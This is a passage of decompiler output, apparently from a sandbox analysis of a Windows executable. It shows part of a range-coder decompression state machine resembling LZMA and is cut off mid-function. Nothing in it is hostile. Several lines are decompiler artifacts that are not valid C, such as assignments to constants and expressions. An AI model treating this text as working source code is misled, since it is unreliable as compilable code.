                                                            				signed int _v108;
                                                            				signed int _v112;
                                                            				signed int _v116;
                                                            				signed int _v120;
                                                            				intOrPtr _v124;
                                                            				signed int _v128;
                                                            				signed int _v132;
                                                            				signed int _v136;
                                                            				void _v140;
                                                            				void* _v148;
                                                            				signed int _t537;
                                                            				signed int _t538;
                                                            				signed int _t572;
                                                            
                                                            				_t572 = 0x22;
                                                            				_v148 = __ecx;
                                                            				memcpy( &_v140, __ecx, _t572 << 2);
                                                            				if(_v52 == 0xffffffff) {
                                                            					return 1;
                                                            				}
                                                            				while(1) {
                                                            					L3:
                                                            					_t537 = _v140;
                                                            					if(_t537 > 0x1c) {
                                                            						break;
                                                            					}
                                                            					switch( *((intOrPtr*)(_t537 * 4 +  &M00406B5B))) {
                                                            						case 0:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								goto L173;
                                                            							}
                                                            							_v112 = _v112 - 1;
                                                            							_v116 = _v116 + 1;
                                                            							_t537 =  *_v116;
                                                            							__eflags = _t537 - 0xe1;
                                                            							if(_t537 > 0xe1) {
                                                            								goto L174;
                                                            							}
                                                            							_t542 = _t537 & 0x000000ff;
                                                            							_push(0x2d);
                                                            							asm("cdq");
                                                            							_pop(_t576);
                                                            							_push(9);
                                                            							_pop(_t577);
                                                            							_t622 = _t542 / _t576;
                                                            							_t544 = _t542 % _t576 & 0x000000ff;
                                                            							asm("cdq");
                                                            							_t617 = _t544 % _t577 & 0x000000ff;
                                                            							_v64 = _t617;
                                                            							_v32 = (1 << _t622) - 1;
                                                            							_v28 = (1 << _t544 / _t577) - 1;
                                                            							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                            							__eflags = 0x600 - _v124;
                                                            							if(0x600 == _v124) {
                                                            								L12:
                                                            								__eflags = _t625;
                                                            								if(_t625 == 0) {
                                                            									L14:
                                                            									_v76 = _v76 & 0x00000000;
                                                            									_v68 = _v68 & 0x00000000;
                                                            									goto L17;
                                                            								} else {
                                                            									goto L13;
                                                            								}
                                                            								do {
                                                            									L13:
                                                            									_t625 = _t625 - 1;
                                                            									__eflags = _t625;
                                                            									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                            								} while (_t625 != 0);
                                                            								goto L14;
                                                            							}
                                                            							__eflags = _v8;
                                                            							if(_v8 != 0) {
                                                            								GlobalFree(_v8);
                                                            							}
                                                            							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                            							__eflags = _t537;
                                                            							_v8 = _t537;
                                                            							if(_t537 == 0) {
                                                            								goto L174;
                                                            							} else {
                                                            								_v124 = 0x600;
                                                            								goto L12;
                                                            							}
                                                            						case 1:
                                                            							L15:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 1;
                                                            								goto L173;
                                                            							}
                                                            							_v112 = _v112 - 1;
                                                            							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                            							_v116 = _v116 + 1;
                                                            							_t50 =  &_v76;
                                                            							 *_t50 = _v76 + 1;
                                                            							__eflags =  *_t50;
                                                            							L17:
                                                            							__eflags = _v76 - 4;
                                                            							if(_v76 < 4) {
                                                            								goto L15;
                                                            							}
                                                            							_t550 = _v68;
                                                            							__eflags = _t550 - _v120;
                                                            							if(_t550 == _v120) {
                                                            								L22:
                                                            								_v76 = 5;
                                                            								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                            								goto L25;
                                                            							}
                                                            							__eflags = _v12;
                                                            							_v120 = _t550;
                                                            							if(_v12 != 0) {
                                                            								GlobalFree(_v12);
                                                            							}
                                                            							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                            							__eflags = _t537;
                                                            							_v12 = _t537;
                                                            							if(_t537 == 0) {
                                                            								goto L174;
                                                            							} else {
                                                            								goto L22;
                                                            							}
                                                            						case 2:
                                                            							L26:
                                                            							_t557 = _v100 & _v32;
                                                            							_v136 = 6;
                                                            							_v80 = _t557;
                                                            							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                            							goto L135;
                                                            						case 3:
                                                            							L23:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 3;
                                                            								goto L173;
                                                            							}
                                                            							_v112 = _v112 - 1;
                                                            							_t72 =  &_v116;
                                                            							 *_t72 = _v116 + 1;
                                                            							__eflags =  *_t72;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							L25:
                                                            							_v76 = _v76 - 1;
                                                            							__eflags = _v76;
                                                            							if(_v76 != 0) {
                                                            								goto L23;
                                                            							}
                                                            							goto L26;
                                                            						case 4:
                                                            							L136:
                                                            							_t559 =  *_t626;
                                                            							_t610 = _t559 & 0x0000ffff;
                                                            							_t591 = (_v20 >> 0xb) * _t610;
                                                            							__eflags = _v16 - _t591;
                                                            							if(_v16 >= _t591) {
                                                            								_v20 = _v20 - _t591;
                                                            								_v16 = _v16 - _t591;
                                                            								_v68 = 1;
                                                            								_t560 = _t559 - (_t559 >> 5);
                                                            								__eflags = _t560;
                                                            								 *_t626 = _t560;
                                                            							} else {
                                                            								_v20 = _t591;
                                                            								_v68 = _v68 & 0x00000000;
                                                            								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                            							}
                                                            							__eflags = _v20 - 0x1000000;
                                                            							if(_v20 >= 0x1000000) {
                                                            								goto L142;
                                                            							} else {
                                                            								goto L140;
                                                            							}
                                                            						case 5:
                                                            							L140:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 5;
                                                            								goto L173;
                                                            							}
                                                            							_v20 = _v20 << 8;
                                                            							_v112 = _v112 - 1;
                                                            							_t464 =  &_v116;
                                                            							 *_t464 = _v116 + 1;
                                                            							__eflags =  *_t464;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							L142:
                                                            							_t561 = _v136;
                                                            							goto L143;
                                                            						case 6:
                                                            							__edx = 0;
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								__eax = _v8;
                                                            								__ecx = _v60;
                                                            								_v56 = 1;
                                                            								_v136 = 7;
                                                            								__esi = _v8 + 0x180 + _v60 * 2;
                                                            								goto L135;
                                                            							}
                                                            							__eax = _v96 & 0x000000ff;
                                                            							__esi = _v100;
                                                            							__cl = 8;
                                                            							__cl = 8 - _v64;
                                                            							__esi = _v100 & _v28;
                                                            							__eax = (_v96 & 0x000000ff) >> 8;
                                                            							__ecx = _v64;
                                                            							__esi = (_v100 & _v28) << 8;
                                                            							__ecx = _v8;
                                                            							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                            							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                            							__eflags = _v60 - 4;
                                                            							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                            							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                            							if(_v60 >= 4) {
                                                            								__eflags = _v60 - 0xa;
                                                            								if(_v60 >= 0xa) {
                                                            									_t103 =  &_v60;
                                                            									 *_t103 = _v60 - 6;
                                                            									__eflags =  *_t103;
                                                            								} else {
                                                            									_v60 = _v60 - 3;
                                                            								}
                                                            							} else {
                                                            								_v60 = 0;
                                                            							}
                                                            							__eflags = _v56 - __edx;
                                                            							if(_v56 == __edx) {
                                                            								__ebx = 0;
                                                            								__ebx = 1;
                                                            								goto L63;
                                                            							}
                                                            							__eax = _v24;
                                                            							__eax = _v24 - _v48;
                                                            							__eflags = __eax - _v120;
                                                            							if(__eax >= _v120) {
                                                            								__eax = __eax + _v120;
                                                            								__eflags = __eax;
                                                            							}
                                                            							__ecx = _v12;
                                                            							__ebx = 0;
                                                            							__ebx = 1;
                                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                                            							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                            							goto L43;
                                                            						case 7:
                                                            							__eflags = _v68 - 1;
                                                            							if(_v68 != 1) {
                                                            								__eax = _v40;
                                                            								_v132 = 0x16;
                                                            								_v36 = _v40;
                                                            								__eax = _v44;
                                                            								_v40 = _v44;
                                                            								__eax = _v48;
                                                            								_v44 = _v48;
                                                            								__eax = 0;
                                                            								__eflags = _v60 - 7;
                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            								__al = __al & 0x000000fd;
                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                            								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                            								__eax = _v8;
                                                            								__eax = _v8 + 0x664;
                                                            								__eflags = __eax;
                                                            								_v92 = __eax;
                                                            								goto L71;
                                                            							}
                                                            							__eax = _v8;
                                                            							__ecx = _v60;
                                                            							_v136 = 8;
                                                            							__esi = _v8 + 0x198 + _v60 * 2;
                                                            							goto L135;
                                                            						case 8:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								__eax = _v8;
                                                            								__ecx = _v60;
                                                            								_v136 = 0xa;
                                                            								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                            							} else {
                                                            								__eax = _v60;
                                                            								__ecx = _v8;
                                                            								__eax = _v60 + 0xf;
                                                            								_v136 = 9;
                                                            								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                            								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                            							}
                                                            							goto L135;
                                                            						case 9:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								goto L92;
                                                            							}
                                                            							__eflags = _v100;
                                                            							if(_v100 == 0) {
                                                            								goto L174;
                                                            							}
                                                            							__eax = 0;
                                                            							__eflags = _v60 - 7;
                                                            							_t264 = _v60 - 7 >= 0;
                                                            							__eflags = _t264;
                                                            							0 | _t264 = _t264 + _t264 + 9;
                                                            							_v60 = _t264 + _t264 + 9;
                                                            							goto L78;
                                                            						case 0xa:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								__eax = _v8;
                                                            								__ecx = _v60;
                                                            								_v136 = 0xb;
                                                            								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                            								goto L135;
                                                            							}
                                                            							__eax = _v44;
                                                            							goto L91;
                                                            						case 0xb:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								__ecx = _v40;
                                                            								__eax = _v36;
                                                            								_v36 = _v40;
                                                            							} else {
                                                            								__eax = _v40;
                                                            							}
                                                            							__ecx = _v44;
                                                            							_v40 = _v44;
                                                            							L91:
                                                            							__ecx = _v48;
                                                            							_v48 = __eax;
                                                            							_v44 = _v48;
                                                            							L92:
                                                            							__eax = _v8;
                                                            							_v132 = 0x15;
                                                            							__eax = _v8 + 0xa68;
                                                            							_v92 = _v8 + 0xa68;
                                                            							goto L71;
                                                            						case 0xc:
                                                            							L102:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0xc;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t340 =  &_v116;
                                                            							 *_t340 = _v116 + 1;
                                                            							__eflags =  *_t340;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							__eax = _v48;
                                                            							goto L104;
                                                            						case 0xd:
                                                            							L39:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0xd;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t127 =  &_v116;
                                                            							 *_t127 = _v116 + 1;
                                                            							__eflags =  *_t127;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							L41:
                                                            							__eax = _v68;
                                                            							__eflags = _v76 - _v68;
                                                            							if(_v76 != _v68) {
                                                            								goto L50;
                                                            							}
                                                            							__eflags = __ebx - 0x100;
                                                            							if(__ebx >= 0x100) {
                                                            								goto L56;
                                                            							}
                                                            							L43:
                                                            							__eax = _v95 & 0x000000ff;
                                                            							_v95 = _v95 << 1;
                                                            							__ecx = _v92;
                                                            							__eax = (_v95 & 0x000000ff) >> 7;
                                                            							_v76 = __eax;
                                                            							__eax = __eax + 1;
                                                            							__eax = __eax << 8;
                                                            							__eax = __eax + __ebx;
                                                            							__esi = _v92 + __eax * 2;
                                                            							_v20 = _v20 >> 0xb;
                                                            							__ax =  *__esi;
                                                            							_v88 = __esi;
                                                            							__edx = __ax & 0x0000ffff;
                                                            							__ecx = (_v20 >> 0xb) * __edx;
                                                            							__eflags = _v16 - __ecx;
                                                            							if(_v16 >= __ecx) {
                                                            								_v20 = _v20 - __ecx;
                                                            								_v16 = _v16 - __ecx;
                                                            								__cx = __ax;
                                                            								_v68 = 1;
                                                            								__cx = __ax >> 5;
                                                            								__eflags = __eax;
                                                            								__ebx = __ebx + __ebx + 1;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								_v68 = _v68 & 0x00000000;
                                                            								_v20 = __ecx;
                                                            								0x800 = 0x800 - __edx;
                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags = _v20 - 0x1000000;
                                                            							_v72 = __ebx;
                                                            							if(_v20 >= 0x1000000) {
                                                            								goto L41;
                                                            							} else {
                                                            								goto L39;
                                                            							}
                                                            						case 0xe:
                                                            							L48:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0xe;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t161 =  &_v116;
                                                            							 *_t161 = _v116 + 1;
                                                            							__eflags =  *_t161;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							while(1) {
                                                            								L50:
                                                            								__eflags = __ebx - 0x100;
                                                            								if(__ebx >= 0x100) {
                                                            									break;
                                                            								}
                                                            								__eax = _v92;
                                                            								__edx = __ebx + __ebx;
                                                            								__ecx = _v20;
                                                            								__esi = __edx + __eax;
                                                            								__ecx = _v20 >> 0xb;
                                                            								__ax =  *__esi;
                                                            								_v88 = __esi;
                                                            								__edi = __ax & 0x0000ffff;
                                                            								__ecx = (_v20 >> 0xb) * __edi;
                                                            								__eflags = _v16 - __ecx;
                                                            								if(_v16 >= __ecx) {
                                                            									_v20 = _v20 - __ecx;
                                                            									_v16 = _v16 - __ecx;
                                                            									__cx = __ax;
                                                            									_t175 = __edx + 1; // 0x1
                                                            									__ebx = _t175;
                                                            									__cx = __ax >> 5;
                                                            									__eflags = __eax;
                                                            									 *__esi = __ax;
                                                            								} else {
                                                            									_v20 = __ecx;
                                                            									0x800 = 0x800 - __edi;
                                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            									__ebx = __ebx + __ebx;
                                                            									 *__esi = __cx;
                                                            								}
                                                            								__eflags = _v20 - 0x1000000;
                                                            								_v72 = __ebx;
                                                            								if(_v20 >= 0x1000000) {
                                                            									continue;
                                                            								} else {
                                                            									goto L48;
                                                            								}
                                                            							}
                                                            							L56:
                                                            							_t178 =  &_v56;
                                                            							 *_t178 = _v56 & 0x00000000;
                                                            							__eflags =  *_t178;
                                                            							goto L57;
                                                            						case 0xf:
                                                            							L60:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0xf;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t208 =  &_v116;
                                                            							 *_t208 = _v116 + 1;
                                                            							__eflags =  *_t208;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							L62:
                                                            							__eflags = __ebx - 0x100;
                                                            							if(__ebx >= 0x100) {
                                                            								L57:
                                                            								__al = _v72;
                                                            								_v96 = _v72;
                                                            								goto L58;
                                                            							}
                                                            							L63:
                                                            							__eax = _v92;
                                                            							__edx = __ebx + __ebx;
                                                            							__ecx = _v20;
                                                            							__esi = __edx + __eax;
                                                            							__ecx = _v20 >> 0xb;
                                                            							__ax =  *__esi;
                                                            							_v88 = __esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = (_v20 >> 0xb) * __edi;
                                                            							__eflags = _v16 - __ecx;
                                                            							if(_v16 >= __ecx) {
                                                            								_v20 = _v20 - __ecx;
                                                            								_v16 = _v16 - __ecx;
                                                            								__cx = __ax;
                                                            								_t222 = __edx + 1; // 0x1
                                                            								__ebx = _t222;
                                                            								__cx = __ax >> 5;
                                                            								__eflags = __eax;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								_v20 = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags = _v20 - 0x1000000;
                                                            							_v72 = __ebx;
                                                            							if(_v20 >= 0x1000000) {
                                                            								goto L62;
                                                            							} else {
                                                            								goto L60;
                                                            							}
                                                            						case 0x10:
                                                            							L112:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0x10;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t371 =  &_v116;
                                                            							 *_t371 = _v116 + 1;
                                                            							__eflags =  *_t371;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							goto L114;
                                                            						case 0x11:
                                                            							L71:
                                                            							__esi = _v92;
                                                            							_v136 = 0x12;
                                                            							goto L135;
                                                            						case 0x12:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								__eax = _v92;
                                                            								_v136 = 0x13;
                                                            								__esi = _v92 + 2;
                                                            								L135:
                                                            								_v88 = _t626;
                                                            								goto L136;
                                                            							}
                                                            							__eax = _v80;
                                                            							_v52 = _v52 & 0x00000000;
                                                            							__ecx = _v92;
                                                            							__eax = _v80 << 4;
                                                            							__eflags = __eax;
                                                            							__eax = _v92 + __eax + 4;
                                                            							goto L133;
                                                            						case 0x13:
                                                            							__eflags = _v68;
                                                            							if(_v68 != 0) {
                                                            								_t475 =  &_v92;
                                                            								 *_t475 = _v92 + 0x204;
                                                            								__eflags =  *_t475;
                                                            								_v52 = 0x10;
                                                            								_v68 = 8;
                                                            								L147:
                                                            								_v128 = 0x14;
                                                            								goto L148;
                                                            							}
                                                            							__eax = _v80;
                                                            							__ecx = _v92;
                                                            							__eax = _v80 << 4;
                                                            							_v52 = 8;
                                                            							__eax = _v92 + (_v80 << 4) + 0x104;
                                                            							L133:
                                                            							_v92 = __eax;
                                                            							_v68 = 3;
                                                            							goto L147;
                                                            						case 0x14:
                                                            							_v52 = _v52 + __ebx;
                                                            							__eax = _v132;
                                                            							goto L143;
                                                            						case 0x15:
                                                            							__eax = 0;
                                                            							__eflags = _v60 - 7;
                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            							__al = __al & 0x000000fd;
                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                            							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                            							goto L123;
                                                            						case 0x16:
                                                            							__eax = _v52;
                                                            							__eflags = __eax - 4;
                                                            							if(__eax >= 4) {
                                                            								_push(3);
                                                            								_pop(__eax);
                                                            							}
                                                            							__ecx = _v8;
                                                            							_v68 = 6;
                                                            							__eax = __eax << 7;
                                                            							_v128 = 0x19;
                                                            							_v92 = __eax;
                                                            							goto L148;
                                                            						case 0x17:
                                                            							L148:
                                                            							__eax = _v68;
                                                            							_v84 = 1;
                                                            							_v76 = _v68;
                                                            							goto L152;
                                                            						case 0x18:
                                                            							L149:
                                                            							__eflags = _v112;
                                                            							if(_v112 == 0) {
                                                            								_v140 = 0x18;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v116;
                                                            							__eax = _v16;
                                                            							_v20 = _v20 << 8;
                                                            							__ecx =  *_v116 & 0x000000ff;
                                                            							_v112 = _v112 - 1;
                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							_t490 =  &_v116;
                                                            							 *_t490 = _v116 + 1;
                                                            							__eflags =  *_t490;
                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                            							L151:
                                                            							_t493 =  &_v76;
                                                            							 *_t493 = _v76 - 1;
                                                            							__eflags =  *_t493;
                                                            							L152:
                                                            							__eflags = _v76;
                                                            							if(_v76 <= 0) {
                                                            								__ecx = _v68;
                                                            								__ebx = _v84;
                                                            								0 = 1;
                                                            								__eax = 1 << __cl;
                                                            								__ebx = _v84 - (1 << __cl);
                                                            								__eax = _v128;
                                                            								_v72 = __ebx;
                                                            								L143:
                                                            								_v140 = _t561;
                                                            								goto L3;
                                                            							}
                                                            							__eax = _v84;
                                                            							_v20 = _v20 >> 0xb;
                                                            							__edx = _v84 + _v84;
                                                            							__eax = _v92;
                                                            							__esi = __edx + __eax;
                                                            							_v88 = __esi;
                                                            							__ax =  *__esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = (_v20 >> 0xb) * __edi;
                                                            							__eflags = _v16 - __ecx;
                                                            							if(_v16 >= __ecx) {
                                                            								_v20 = _v20 - __ecx;
                                                            								_v16 = _v16 - __ecx;
                                                            								__cx = __ax;
                                                            								__cx = __ax >> 5;
                                                            								__eax = __eax - __ecx;
                                                            								__edx = __edx + 1;
                                                            								__eflags = __edx;
                                                            								 *__esi = __ax;
                                                            								_v84 = __edx;
                                                            							} else {
                                                            								_v20 = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								_v84 = _v84 << 1;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags = _v20 - 0x1000000;
                                                            							if(_v20 >= 0x1000000) {
                                                            								goto L151;
                                                            							} else {
                                                            								goto L149;
                                                            							}
                                                            						case 0x19:
                                                            							__eflags = __ebx - 4;
                                                            							if(__ebx < 4) {
                                                            								_v48 = __ebx;
                                                            								L122:
                                                            								_t399 =  &_v48;
                                                            								 *_t399 = _v48 + 1;
                                                            								__eflags =  *_t399;
                                                            								L123:
                                                            								__eax = _v48;
                                                            								__eflags = __eax;
                                                            								if(__eax == 0) {
                                                            									_v52 = _v52 | 0xffffffff;
                                                            									goto L173;
                                                            								}
                                                            								__eflags = __eax - _v100;
                                                            								if(__eax > _v100) {
                                                            									goto L174;
                                                            								}
                                                            								_v52 = _v52 + 2;
                                                            								__eax = _v52;
                                                            								_t406 =  &_v100;
                                                            								 *_t406 = _v100 + _v52;
                                                            								__eflags =  *_t406;
                                                            								goto L126;
                                                            							}
                                                            							__ecx = __ebx;
                                                            							__eax = __ebx;
                                                            							__ecx = __ebx >> 1;
                                                            							__eax = __ebx & 0x00000001;
                                                            							__ecx = (__ebx >> 1) - 1;
                                                            							__al = __al | 0x00000002;
                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                            							__eflags = __ebx - 0xe;
                                                            							_v48 = __eax;
                                                            							if(__ebx >= 0xe) {
                                                            								__ebx = 0;
                                                            								_v76 = __ecx;
                                                            								L105:
                                                            								__eflags = _v76;
                                                            								if(_v76 <= 0) {
                                                            									__eax = __eax + __ebx;
                                                            									_v68 = 4;
                                                            									_v48 = __eax;
                                                            									__eax = _v8;
                                                            									__eax = _v8 + 0x644;
                                                            									__eflags = __eax;
                                                            									L111:
                                                            									__ebx = 0;
                                                            									_v92 = __eax;
                                                            									_v84 = 1;
                                                            									_v72 = 0;
                                                            									_v76 = 0;
                                                            									L115:
                                                            									__eax = _v68;
                                                            									__eflags = _v76 - _v68;
                                                            									if(_v76 >= _v68) {
                                                            										_t397 =  &_v48;
                                                            										 *_t397 = _v48 + __ebx;
                                                            										__eflags =  *_t397;
                                                            										goto L122;
                                                            									}
                                                            									__eax = _v84;
                                                            									_v20 = _v20 >> 0xb;
                                                            									__edi = _v84 + _v84;
                                                            									__eax = _v92;
                                                            									__esi = __edi + __eax;
                                                            									_v88 = __esi;
                                                            									__ax =  *__esi;
                                                            									__ecx = __ax & 0x0000ffff;
                                                            									__edx = (_v20 >> 0xb) * __ecx;
                                                            									__eflags = _v16 - __edx;
                                                            									if(_v16 >= __edx) {
                                                            										__ecx = 0;
                                                            										_v20 = _v20 - __edx;
                                                            										__ecx = 1;
                                                            										_v16 = _v16 - __edx;
                                                            										__ebx = 1;
                                                            										__ecx = _v76;
                                                            										__ebx = 1 << __cl;
                                                            										__ecx = 1 << __cl;
                                                            										__ebx = _v72;
                                                            										__ebx = _v72 | __ecx;
                                                            										__cx = __ax;
                                                            										__cx = __ax >> 5;
                                                            										__eax = __eax - __ecx;
                                                            										__edi = __edi + 1;
                                                            										__eflags = __edi;
                                                            										_v72 = __ebx;
                                                            										 *__esi = __ax;
                                                            										_v84 = __edi;
                                                            									} else {
                                                            										_v20 = __edx;
                                                            										0x800 = 0x800 - __ecx;
                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            										_v84 = _v84 << 1;
                                                            										 *__esi = __dx;
                                                            									}
                                                            									__eflags = _v20 - 0x1000000;
                                                            									if(_v20 >= 0x1000000) {
                                                            										L114:
                                                            										_t374 =  &_v76;
                                                            										 *_t374 = _v76 + 1;
                                                            										__eflags =  *_t374;
                                                            										goto L115;
                                                            									} else {
                                                            										goto L112;
                                                            									}
                                                            								}
                                                            								__ecx = _v16;
                                                            								__ebx = __ebx + __ebx;
                                                            								_v20 = _v20 >> 1;
                                                            								__eflags = _v16 - _v20;
                                                            								_v72 = __ebx;
                                                            								if(_v16 >= _v20) {
                                                            									__ecx = _v20;
                                                            									_v16 = _v16 - _v20;
                                                            									__ebx = __ebx | 0x00000001;
                                                            									__eflags = __ebx;
                                                            									_v72 = __ebx;
                                                            								}
                                                            								__eflags = _v20 - 0x1000000;
                                                            								if(_v20 >= 0x1000000) {
                                                            									L104:
                                                            									_t344 =  &_v76;
                                                            									 *_t344 = _v76 - 1;
                                                            									__eflags =  *_t344;
                                                            									goto L105;
                                                            								} else {
                                                            									goto L102;
                                                            								}
                                                            							}
                                                            							__edx = _v8;
                                                            							__eax = __eax - __ebx;
                                                            							_v68 = __ecx;
                                                            							__eax = _v8 + 0x55e + __eax * 2;
                                                            							goto L111;
                                                            						case 0x1a:
                                                            							L58:
                                                            							__eflags = _v104;
                                                            							if(_v104 == 0) {
                                                            								_v140 = 0x1a;
                                                            								goto L173;
                                                            							}
                                                            							__ecx = _v108;
                                                            							__al = _v96;
                                                            							__edx = _v12;
                                                            							_v100 = _v100 + 1;
                                                            							_v108 = _v108 + 1;
                                                            							_v104 = _v104 - 1;
                                                            							 *_v108 = __al;
                                                            							__ecx = _v24;
                                                            							 *(_v12 + __ecx) = __al;
                                                            							__eax = __ecx + 1;
                                                            							__edx = 0;
                                                            							_t197 = __eax % _v120;
                                                            							__eax = __eax / _v120;
                                                            							__edx = _t197;
                                                            							goto L82;
                                                            						case 0x1b:
                                                            							L78:
                                                            							__eflags = _v104;
                                                            							if(_v104 == 0) {
                                                            								_v140 = 0x1b;
                                                            								goto L173;
                                                            							}
                                                            							__eax = _v24;
                                                            							__eax = _v24 - _v48;
                                                            							__eflags = __eax - _v120;
                                                            							if(__eax >= _v120) {
                                                            								__eax = __eax + _v120;
                                                            								__eflags = __eax;
                                                            							}
                                                            							__edx = _v12;
                                                            							__cl =  *(__edx + __eax);
                                                            							__eax = _v24;
                                                            							_v96 = __cl;
                                                            							 *(__edx + __eax) = __cl;
                                                            							__eax = __eax + 1;
                                                            							__edx = 0;
                                                            							_t280 = __eax % _v120;
                                                            							__eax = __eax / _v120;
                                                            							__edx = _t280;
                                                            							__eax = _v108;
                                                            							_v100 = _v100 + 1;
                                                            							_v108 = _v108 + 1;
                                                            							_t289 =  &_v104;
                                                            							 *_t289 = _v104 - 1;
                                                            							__eflags =  *_t289;
                                                            							 *_v108 = __cl;
                                                            							L82:
                                                            							_v24 = __edx;
                                                            							goto L83;
                                                            						case 0x1c:
                                                            							while(1) {
